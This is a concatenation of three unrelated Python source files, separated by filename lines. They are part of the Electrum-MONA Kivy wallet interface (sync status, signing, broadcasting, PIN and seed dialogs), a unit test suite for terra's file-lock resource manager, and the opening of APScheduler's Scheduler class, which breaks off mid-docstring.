if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging (%d blocks)"%server_lag)
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
status = str(text.strip() + ' ' + self.base_unit)
else:
status = _("Disconnected")
n = self.wallet.basename()
self.status = '[size=15dp]%s[/size]\n%s' %(n, status)
#fiat_balance = self.fx.format_amount_and_units(c+u+x) or ''
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum-MONA', message,
app_icon=icon, app_name='Electrum-MONA')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
# workaround p4a bug:
# show an empty info bubble, to refresh the display
self.show_info_bubble('', duration=0.1, pos=(0,0), width=1, arrow_pos=None)
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show a error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show a Info Message Bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show a Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
@profiler
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def protected(self, msg, f, args):
if self.wallet.has_password():
self.password_dialog(msg, f, args)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = os.path.basename(self.wallet.storage.path)
self.protected(_("Enter your PIN code to confirm deletion of %s") % basename, self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def change_password(self, cb):
if self.wallet.has_password():
self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,))
else:
self._change_password(cb, None)
def _change_password(self, cb, old_password):
if self.wallet.has_password():
if old_password is None:
return
try:
self.wallet.check_password(old_password)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,))
def _change_password2(self, cb, old_password, new_password):
self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password))
def _change_password3(self, cb, old_password, new_password, confirmed_password):
if new_password == confirmed_password:
self.wallet.update_password(old_password, new_password)
cb()
else:
self.show_error("PIN numbers do not match")
def password_dialog(self, msg, f, args):
from .uix.dialogs.password_dialog import PasswordDialog
def callback(pw):
Clock.schedule_once(lambda x: f(*(args + (pw,))), 0.1)
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(msg, callback)
self._password_dialog.open()
|
test_executor_resources.py
|
import os
from concurrent.futures import as_completed
from multiprocessing import Process
import platform
from unittest import mock
import filelock
from vsi.tools.dir_util import is_dir_empty
from terra.tests.utils import (
TestSettingsConfigureCase, TestCase, TestThreadPoolExecutorCase
)
from terra.executor.process import ProcessPoolExecutor
from terra.executor.thread import ThreadPoolExecutor
from terra.executor.resources import (
Resource, ResourceError, test_dir, logger as resource_logger,
ProcessLocalStorage, ThreadLocalStorage, ResourceManager,
atexit_resource_release
)
from terra import settings
# Cheat code: Run test 100 times, efficiently, good for looking for
# intermittent issues
# just --wrap Terra_Pipenv run env TERRA_UNITTEST=1 python -c \
# "from unittest.main import main; main(
# module=None,
# argv=['', '-f']+100*[
# 'terra.tests.test_executor_resources.TestResourceLock.test_items'
# ]
# )"
def get_lock_dir(name):
return os.path.join(settings.processing_dir, '.resource.locks',
platform.node(), str(os.getpid()), name)
class TestResourceCase(TestSettingsConfigureCase):
def setUp(self):
self.config.executor = {'type': 'SyncExecutor'}
super().setUp()
class TestResourceSimple(TestResourceCase):
def test_resource_registry(self):
# Test that the ledger of all resources is working
resource = Resource('ok', 1)
self.assertIn(resource, Resource._resources)
resource = None
self.assertNotIn(resource, Resource._resources)
def test_file_name(self):
# test Resource.lock_file_name
resource = Resource('stuff', 1)
lock_dir = get_lock_dir('stuff')
self.assertEqual(resource.lock_file_name(0, 0),
os.path.join(lock_dir, '0.0.lock'))
self.assertEqual(resource.lock_file_name(10, 999),
os.path.join(lock_dir, '10.999.lock'))
class TestResourceLock(TestResourceCase):
def test_acquire_single(self):
# test acquiring a lock in a single thread
test1 = Resource('single', 2, 1)
test2 = Resource('single', 2, 1)
test3 = Resource('single', 2, 1)
lock1 = test1.acquire()
lock2 = test1.acquire()
# Acquiring twice, should use the same value
self.assertEqual(lock1, lock2)
lock3 = test2.acquire()
# However, using an entirely different resource instance, won't have cache
self.assertNotEqual(lock1, lock3)
# At this point, I should be out of resources
with self.assertRaises(ResourceError):
test3.acquire()
# cleanup warnings
test1.release(force=True)
test2.release(force=True)
def test_release(self):
# test releasing a lock in a single thread
test = Resource('test', 1, 1)
test.acquire()
lock = test._local.lock
self.assertIsNotNone(test._local.lock)
self.assertIsNotNone(test._local.resource_id)
self.assertIsNotNone(test._local.instance_id)
test.release()
# make sure file and cache is cleaned up
self.assertNotExist(lock.lock_file)
self.assertIsNone(test._local.lock)
self.assertIsNone(test._local.resource_id)
self.assertIsNone(test._local.instance_id)
def test_force_release(self):
test = Resource('test', 1, 1)
test.acquire()
test.acquire()
test.release(force=True)
self.assertFalse(test.is_locked)
def test_release_on_delete(self):
# test leftover locks are detected and cleaned up
test = Resource('test', 1, 1)
test.acquire()
with self.assertLogs('terra.executor.resources', level='WARNING') as cm:
filename = test._local.lock._lock_file
self.assertExist(filename)
del(test)
self.assertNotExist(filename)
self.assertIn('A test resource was not released. Cleaning up on delete.',
cm.output[0])
def test_atexit(self):
test2 = Resource('test2', 1, 1)
test3 = Resource('test3', 1, 1)
test2.acquire()
test3.acquire()
test3.acquire()
filename2 = test2._local.lock._lock_file
filename3 = test3._local.lock._lock_file
self.assertExist(filename2)
self.assertExist(filename3)
atexit_resource_release()
self.assertNotExist(filename2)
self.assertNotExist(filename3)
def test_multiple_release(self):
test = Resource('test', 1, 1)
self.assertFalse(test.is_locked)
test.acquire()
self.assertTrue(test.is_locked)
self.assertEqual(test._local.lock._lock_counter, 1)
test.acquire()
self.assertTrue(test.is_locked)
self.assertEqual(test._local.lock._lock_counter, 2)
test.release()
self.assertTrue(test.is_locked)
self.assertEqual(test._local.lock._lock_counter, 1)
test.release()
self.assertFalse(test.is_locked)
with self.assertRaisesRegex(ValueError,
"Release called with no lock acquired"):
test.release()
def test_dir_cleanup(self):
# Test that empty lock dir is auto deleted
resource = Resource('test', 1, 1)
if filelock.FileLock == filelock.SoftFileLock:
self.assertNotExist(resource.lock_dir)
else:
self.assertExist(resource.lock_dir, is_dir=True)
resource.acquire()
self.assertExist(resource.lock_dir, is_dir=True)
lock_file = resource._local.lock.lock_file
self.assertExist(lock_file)
resource.release()
self.assertNotExist(lock_file)
self.assertNotExist(resource.lock_dir)
def test_with_context(self):
# test with
resource = Resource('test', 2, 1)
self.assertFalse(resource.is_locked)
with resource as r1:
self.assertTrue(resource.is_locked)
self.assertFalse(resource.is_locked)
with resource as r2:
with resource as r3:
self.assertTrue(resource.is_locked)
self.assertEqual(resource._local.lock._lock_counter, 2)
self.assertTrue(resource.is_locked)
self.assertFalse(resource.is_locked)
self.assertEqual(r1, r2)
self.assertEqual(r2, r3)
def test_repeats(self):
# test repeated resources
repeat1 = Resource('repeat', 2, 2)
repeat2 = Resource('repeat', 2, 2)
repeat3 = Resource('repeat', 2, 2)
repeat4 = Resource('repeat', 2, 2)
repeat5 = Resource('repeat', 2, 2)
lock1 = repeat1.acquire()
lock2 = repeat2.acquire()
lock3 = repeat3.acquire()
lock4 = repeat4.acquire()
# Four unique names
self.assertEqual(len({repeat1._local.lock.lock_file,
repeat2._local.lock.lock_file,
repeat3._local.lock.lock_file,
repeat4._local.lock.lock_file}), 4)
# reacquire, cache
lock1b = repeat1.acquire()
lock2b = repeat2.acquire()
lock3b = repeat3.acquire()
lock4b = repeat4.acquire()
self.assertEqual(lock1, lock1b)
self.assertEqual(lock2, lock2b)
self.assertEqual(lock3, lock3b)
self.assertEqual(lock4, lock4b)
with self.assertRaises(ResourceError):
repeat5.acquire()
self.assertEqual(lock1, 0)
self.assertEqual(repeat1._local.instance_id, 0)
self.assertEqual(lock2, 1)
self.assertEqual(repeat2._local.instance_id, 0)
self.assertEqual(lock3, 0)
self.assertEqual(repeat3._local.instance_id, 1)
self.assertEqual(lock4, 1)
self.assertEqual(repeat4._local.instance_id, 1)
# Clean up warnings
repeat1.release(force=True)
repeat2.release(force=True)
repeat3.release(force=True)
repeat4.release(force=True)
def test_items(self):
# Test list of objects as resources
resource1 = Resource('items', ['foo', 'bar'])
resource2 = Resource('items', ['foo', 'bar'])
resource3 = Resource('items', ['foo', 'bar'])
foo = resource1.acquire()
self.assertEqual(foo, 'foo')
self.assertEqual(foo, resource1.acquire())
bar = resource2.acquire()
self.assertEqual(bar, 'bar')
self.assertEqual(bar, resource2.acquire())
with self.assertRaises(ResourceError):
resource3.acquire()
# Clean up warnings
resource1.release(force=True)
resource2.release(force=True)
def test_none(self):
# Early version of the code used None in such a way it tripped up the logic
# This test is to make sure that doesn't happen again.
resource1 = Resource('none', [None, None, 1], 1)
resource2 = Resource('none', [None, None, 1], 1)
resource3 = Resource('none', [None, None], 1)
n1 = resource1.acquire()
self.assertIsNone(n1)
# Prevent the accidental delete lock loophole, which would create a race
# condition, if not caught
lock1 = resource1._local.lock
self.assertIsNone(resource1.acquire())
n2 = resource2.acquire()
self.assertIsNone(n2)
# resource2 should already be acquired, make sure it's not accidentally
# unlocking and relocking again
lock1.release()
self.assertIsNone(resource2.acquire())
lock1.acquire(timeout=0)
# two unique names
self.assertEqual(len({resource1._local.lock.lock_file,
resource2._local.lock.lock_file}), 2)
with self.assertRaises(ResourceError):
resource3.acquire()
# Clean up warnings
resource1.release(force=True)
resource2.release(force=True)
class TestResourceSoftLock(TestResourceLock):
# test soft lock specific behaviors
def setUp(self):
self.patches.append(mock.patch.object(filelock, 'FileLock',
filelock.SoftFileLock))
super().setUp()
def test_dirty_dir(self):
# test leftover locks are detected and cleaned up
lock_dir = get_lock_dir('dirty')
os.makedirs(lock_dir, exist_ok=True)
with self.assertLogs('terra.executor.resources', level='WARNING') as cm:
resource_logger.warning('None')
Resource('dirty', 1, 1)
self.assertEqual(len(cm.output), 1)
with open(os.path.join(lock_dir, 'foo'), 'w') as fid:
fid.write('ok')
with self.assertLogs('terra.executor.resources', level='WARNING') as cm:
resource2 = Resource('dirty', 1, 1)
self.assertIn('is not empty. Deleting it now', cm.output[0])
self.assertFalse(os.path.exists(resource2.lock_dir))
class TestResourceSoftLockSelection(TestResourceCase):
# Just testing the switch to softlock mechanism works
@mock.patch.object(filelock, 'FileLock', filelock.SoftFileLock)
def test_no_os_hard(self):
# test when the os doesn't support hard locks
lock_dir = get_lock_dir('no_os_hard')
self.assertNotExist(lock_dir)
resource1 = Resource('no_os_hard', 1, use_softfilelock=None)
resource2 = Resource('no_os_hard', 1, use_softfilelock=False)
resource3 = Resource('no_os_hard', 1, use_softfilelock=True)
self.assertNotExist(lock_dir)
self.assertEqual(resource1.FileLock, filelock.SoftFileLock)
self.assertEqual(resource2.FileLock, filelock.SoftFileLock)
self.assertEqual(resource3.FileLock, filelock.SoftFileLock)
@mock.patch.object(filelock.UnixFileLock, '_acquire',
lambda self: exec("raise OSError('Fake fail')"))
@mock.patch.object(filelock.WindowsFileLock, '_acquire',
lambda self: exec("raise OSError('Fake fail')"))
def test_no_dir_hard_support(self):
# Test dir test creating when dir does not support hard lock
self.assertFalse(test_dir(self.temp_dir.name))
lock_dir1 = get_lock_dir('no_dir_hard1')
lock_dir2 = get_lock_dir('no_dir_hard2')
lock_dir3 = get_lock_dir('no_dir_hard3')
self.assertNotExist(lock_dir1)
self.assertNotExist(lock_dir2)
self.assertNotExist(lock_dir3)
# When test would show using hard locks would fail
resource1 = Resource('no_dir_hard1', 1, use_softfilelock=None)
resource2 = Resource('no_dir_hard2', 1, # noqa: F841
use_softfilelock=True)
resource3 = Resource('no_dir_hard3', 1, # noqa: F841
use_softfilelock=False)
self.assertExist(lock_dir1, is_dir=True)
self.assertNotExist(lock_dir2)
self.assertNotExist(lock_dir3)
self.assertEqual(resource1.FileLock, filelock.SoftFileLock)
@mock.patch.object(filelock, 'FileLock',
filelock.WindowsFileLock if os.name == 'nt'
else filelock.UnixFileLock)
def test_softlock_test(self):
# Test dir test creating when os does support hard lock
lock_dir1 = get_lock_dir('soft1')
lock_dir2 = get_lock_dir('soft2')
lock_dir3 = get_lock_dir('soft3')
self.assertNotExist(lock_dir1)
self.assertNotExist(lock_dir2)
self.assertNotExist(lock_dir3)
resource1 = Resource('soft1', 1, use_softfilelock=None) # noqa: F841
resource2 = Resource('soft2', 1, use_softfilelock=True) # noqa: F841
resource3 = Resource('soft3', 1, use_softfilelock=False) # noqa: F841
self.assertExist(lock_dir1, is_dir=True)
self.assertNotExist(lock_dir2)
self.assertNotExist(lock_dir3)
self.assertTrue(is_dir_empty(lock_dir1))
# tearDown will auto clear this:
# 1) preventing inter-test name collisions
# 2) stopping strong refs of resources from being kept around
data = {}
# Cannot be member of test case class, because TestCase is not serializable.
# Somewhere in testcase's _outcome "cannot serialize '_io.TextIOWrapper'
# object" error occurs
def acquire(name, i):
# This function is meant to be called once for a worker, and has some hacks
# to guarantee simulation of that. If you are adding another test, you
# probably don't want to use this function, so copy it and make a similar one
l1 = data[name].acquire()
l2 = data[name].acquire()
# There is a chance that the same thread/process will be reused because of
# how concurrent.futures optimizes, but i is unique, and used to prevent
# deleting the local storage locks, for the purpose of this test. This is
# meant to simulate "three _different_ threads/processes"
data[name + str(i)] = data[name]._local.lock
# Reset "worker local storage"
data[name]._local.lock = None
data[name]._local.resource_id = None
data[name]._local.instance_id = None
return (l1, l2)
def simple_acquire(name):
rv = data[name].acquire()
# import time
# time.sleep(0.1)
return rv
class TestResourceMulti:
'''
Test that Resource works
'''
def setUp(self):
self.config.executor = {'type': self.name}
super().setUp()
def tearDown(self):
data.clear()
super().tearDown()
def test_acquire(self):
# test acquiring in parallel
data[self.name] = Resource(self.name, 2, 1)
futures = []
results = []
exceptions = 0
with self.Executor(max_workers=3) as executor:
for i in range(3):
futures.append(executor.submit(acquire, self.name, i))
for future in as_completed(futures):
try:
results.append(future.result())
except ResourceError:
exceptions += 1
self.assertEqual(exceptions, 1)
self.assertNotEqual(results[0], results[1])
self.assertEqual(results[0][0], results[0][1])
self.assertEqual(results[1][0], results[1][1])
def test_multiple_executor(self):
# unlike test_acquire, this is not trying to test the exception, so there
# is no need to force locks to not unlock. In fact that would break this
# test. Test to see that locks are indeed cleaned up automatically in a
# way that means one executor after the other will not interfere with each
# other.
data[self.name] = Resource(self.name, 1, 1)
for _ in range(2):
futures = []
with self.Executor(max_workers=1) as executor:
futures.append(executor.submit(simple_acquire, self.name))
for future in as_completed(futures):
future.result()
# double check resource was freed
data[self.name].acquire()
data[self.name].release()
def test_local_storage_type(self):
# test the types are right
resource = Resource('storage', 2, 1)
if self.Executor.multiprocess:
self.assertIsInstance(resource._local, ProcessLocalStorage)
else:
self.assertIsInstance(resource._local, ThreadLocalStorage)
class TestResourceThread(TestResourceMulti,
TestSettingsConfigureCase,
TestThreadPoolExecutorCase):
# Test for multithreaded case
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.Executor = ThreadPoolExecutor
self.name = "ThreadPoolExecutor"
class TestResourceProcess(TestResourceMulti,
TestSettingsConfigureCase):
# Test for multiprocess case
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.Executor = ProcessPoolExecutor
self.name = "ProcessPoolExecutor"
@mock.patch.object(filelock, 'FileLock', filelock.SoftFileLock)
def test_full(self):
# Test resource recovery after a premature termination
lock_dir = get_lock_dir('full')
resource = Resource('full', ['foo'], 1)
os.makedirs(lock_dir, exist_ok=True)
with open(os.path.join(lock_dir, '0.0.lock'), 'w') as fid:
fid.write(str(os.getpid()))
with self.assertRaises(ResourceError):
resource.acquire()
process = Process(target=lambda: 0)
process.start()
dead_pid = process.pid
process.join()
with open(os.path.join(lock_dir, '0.0.lock'), 'w') as fid:
fid.write(str(dead_pid))
lock = resource.acquire()
self.assertEqual(lock, 'foo')
# Test that additional calls to acquire after recovering resource, work
self.assertEqual(lock, resource.acquire())
# Clean up warnings
resource.release(force=True)
class TestResourceManager(TestResourceCase):
def setUp(self):
self.patches.append(mock.patch.dict(ResourceManager.resources))
super().setUp()
def test_register(self):
# test registration and recall work
ResourceManager.register_resource('registered', 3, 2)
ResourceManager.register_resource('pets', ['cat', 'dog', 'bird'], 1)
resource = ResourceManager.get_resource('registered')
self.assertEqual(resource.name, 'registered')
self.assertEqual(resource.repeat, 2)
self.assertEqual(resource.resources, range(3))
resource = ResourceManager.get_resource('pets')
self.assertEqual(resource.name, 'pets')
self.assertEqual(resource.repeat, 1)
self.assertEqual(resource.resources, ['cat', 'dog', 'bird'])
def test_unregistered(self):
# Test getting unregistered fails
with self.assertRaises(KeyError):
ResourceManager.get_resource('unregistered')
class TestStrayResources(TestCase):
def last_test_stray_resources(self):
# Makes sure no tests leave any resources registered, possibly interfering
# with other tests.
self.assertDictEqual(ResourceManager.resources, {})
# Make sure there aren't any resources left over after all the tests have
# run. Passing this means that every test that has run has used the correct
# mock patches or haven't kept any references around in global persistence
self.assertSetEqual(Resource._resources, set())
|
scheduler.py
|
"""
This module is the main part of the library. It houses the Scheduler class
and related exceptions.
"""
from threading import Thread, Event, Lock
from datetime import datetime, timedelta
from logging import getLogger
import os
import sys
from apscheduler.util import *
from apscheduler.triggers import SimpleTrigger, IntervalTrigger, CronTrigger
from apscheduler.jobstores.ram_store import RAMJobStore
from apscheduler.job import Job, MaxInstancesReachedError
from apscheduler.events import *
from apscheduler.threadpool import ThreadPool
logger = getLogger(__name__)
class SchedulerAlreadyRunningError(Exception):
"""
Raised when attempting to start or configure the scheduler when it's
already running.
"""
def __str__(self):
return 'Scheduler is already running'
class Scheduler(object):
"""
This class is responsible for scheduling jobs and triggering
their execution.
"""
_stopped = True
_thread = None
def __init__(self, gconfig={}, **options):
self._wakeup = Event()
self._jobstores = {}
self._jobstores_lock = Lock()
self._listeners = []
self._listeners_lock = Lock()
self._pending_jobs = []
self.configure(gconfig, **options)
def configure(self, gconfig={}, **options):
"""
Reconfigures the scheduler with the given options. Can only be done
when the scheduler isn't running.
"""
if self.running:
raise SchedulerAlreadyRunningError
# Set general options
config = combine_opts(gconfig, 'apscheduler.', options)
self.misfire_grace_time = int(config.pop('misfire_grace_time', 1))
self.coalesce = asbool(config.pop('coalesce', True))
self.daemonic = asbool(config.pop('daemonic', True))
self.standalone = asbool(config.pop('standalone', False))
# Configure the thread pool
if 'threadpool' in config:
self._threadpool = maybe_ref(config['threadpool'])
else:
threadpool_opts = combine_opts(config, 'threadpool.')
self._threadpool = ThreadPool(**threadpool_opts)
# Configure job stores
jobstore_opts = combine_opts(config, 'jobstore.')
jobstores = {}
for key, value in jobstore_opts.items():
store_name, option = key.split('.', 1)
opts_dict = jobstores.setdefault(store_name, {})
opts_dict[option] = value
for alias, opts in jobstores.items():
classname = opts.pop('class')
cls = maybe_ref(classname)
jobstore = cls(**opts)
self.add_jobstore(jobstore, alias, True)
def start(self):
"""
Starts the scheduler in a new thread.
In threaded mode (the default), this method will return immediately
after starting the scheduler thread.
In standalone mode, this method will block until there are no more
scheduled jobs.
"""
if self.running:
raise SchedulerAlreadyRunningError
# Create a RAMJobStore as the default if there is no default job store
if not 'default' in self._jobstores:
self.add_jobstore(RAMJobStore(), 'default', True)
# Schedule all pending jobs
for job, jobstore in self._pending_jobs:
self._real_add_job(job, jobstore, False)
del self._pending_jobs[:]
self._stopped = False
if self.standalone:
self._main_loop()
else:
self._thread = Thread(target=self._main_loop, name='APScheduler')
self._thread.setDaemon(self.daemonic)
self._thread.start()
def shutdown(self, wait=True, shutdown_threadpool=True,
close_jobstores=True):
"""
Shuts down the scheduler and terminates the thread.
Does not interrupt any currently running jobs.
:param wait: ``True`` to wait until all currently executing jobs have
finished (if ``shutdown_threadpool`` is also ``True``)
:param shutdown_threadpool: ``True`` to shut down the thread pool
:param close_jobstores: ``True`` to close all job stores after shutdown
"""
if not self.running:
return
self._stopped = True
self._wakeup.set()
# Shut down the thread pool
if shutdown_threadpool:
self._threadpool.shutdown(wait)
# Wait until the scheduler thread terminates
if self._thread:
self._thread.join()
# Close all job stores
if close_jobstores:
for jobstore in itervalues(self._jobstores):
jobstore.close()
@property
def running(self):
thread_alive = self._thread and self._thread.isAlive()
standalone = getattr(self, 'standalone', False)
return not self._stopped and (standalone or thread_alive)
def add_jobstore(self, jobstore, alias, quiet=False):
"""
Adds a job store to this scheduler.
:param jobstore: job store to be added
:param alias: alias for the job store
:param quiet: True to suppress scheduler thread wakeup
:type jobstore: instance of
:class:`~apscheduler.jobstores.base.JobStore`
:type alias: str
"""
self._jobstores_lock.acquire()
try:
if alias in self._jobstores:
raise KeyError('Alias "%s" is already in use' % alias)
self._jobstores[alias] = jobstore
jobstore.load_jobs()
finally:
self._jobstores_lock.release()
# Notify listeners that a new job store has been added
self._notify_listeners(JobStoreEvent(EVENT_JOBSTORE_ADDED, alias))
# Notify the scheduler so it can scan the new job store for jobs
if not quiet:
self._wakeup.set()
def remove_jobstore(self, alias, close=True):
"""
Removes the job store by the given alias from this scheduler.
:param close: ``True`` to close the job store after removing it
:type alias: str
"""
self._jobstores_lock.acquire()
try:
jobstore = self._jobstores.pop(alias)
if not jobstore:
raise KeyError('No such job store: %s' % alias)
finally:
self._jobstores_lock.release()
# Close the job store if requested
if close:
jobstore.close()
# Notify listeners that a job store has been removed
self._notify_listeners(JobStoreEvent(EVENT_JOBSTORE_REMOVED, alias))
def add_listener(self, callback, mask=EVENT_ALL):
"""
Adds a listener for scheduler events. When a matching event occurs,
``callback`` is executed with the event object as its sole argument.
If the ``mask`` parameter is not provided, the callback will receive
events of all types.
:param callback: any callable that takes one argument
:param mask: bitmask that indicates which events should be listened to
"""
self._listeners_lock.acquire()
try:
self._listeners.append((callback, mask))
finally:
self._listeners_lock.release()
def remove_listener(self, callback):
"""
Removes a previously added event listener.
"""
self._listeners_lock.acquire()
try:
for i, (cb, _) in enumerate(self._listeners):
if callback == cb:
del self._listeners[i]
finally:
self._listeners_lock.release()
def _notify_listeners(self, event):
self._listeners_lock.acquire()
try:
listeners = tuple(self._listeners)
finally:
self._listeners_lock.release()
for cb, mask in listeners:
if event.code & mask:
try:
cb(event)
except:
logger.exception('Error notifying listener')
def _real_add_job(self, job, jobstore, wakeup):
job.compute_next_run_time(datetime.now())
if not job.next_run_time:
raise ValueError('Not adding job since it would never be run')
self._jobstores_lock.acquire()
try:
try:
store = self._jobstores[jobstore]
except KeyError:
raise KeyError('No such job store: %s' % jobstore)
store.add_job(job)
finally:
self._jobstores_lock.release()
# Notify listeners that a new job has been added
event = JobStoreEvent(EVENT_JOBSTORE_JOB_ADDED, jobstore, job)
self._notify_listeners(event)
logger.debug('Added job "%s" to job store "%s"', job, jobstore)
# Notify the scheduler about the new job
if wakeup:
self._wakeup.set()
def add_job(self, trigger, func, args, kwargs, jobstore='default',
**options):
"""
Adds the given job to the job list and notifies the scheduler thread.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
:param trigger: trigger that determines when ``func`` is called
:param func: callable to run at the given time
:param args: list of positional arguments to call func with
:param kwargs: dict of keyword arguments to call func with
:param jobstore: alias of the job store to store the job in
:rtype: :class:`~apscheduler.job.Job`
"""
job = Job(trigger, func, args or [], kwargs or {},
options.pop('misfire_grace_time', self.misfire_grace_time),
options.pop('coalesce', self.coalesce), **options)
if not self.running:
self._pending_jobs.append((job, jobstore))
logger.info('Adding job tentatively -- it will be properly '
'scheduled when the scheduler starts')
else:
self._real_add_job(job, jobstore, True)
return job
def _remove_job(self, job, alias, jobstore):
jobstore.remove_job(job)
# Notify listeners that a job has been removed
event = JobStoreEvent(EVENT_JOBSTORE_JOB_REMOVED, alias, job)
self._notify_listeners(event)
logger.info('Removed job "%s"', job)
def add_date_job(self, func, date, args=None, kwargs=None, **options):
"""
Schedules a job to be completed on a specific date and time.
Any extra keyword arguments are passed along to the constructor of the
:class:`~apscheduler.job.Job` class (see :ref:`job_options`).
:param func: callable to run at the given time
:param date: the date/time to run the job at
:param name: name of the job
:param jobstore: stored the job in the named (or given) job store
:param misfire_grace_time: seconds after the designated run time that
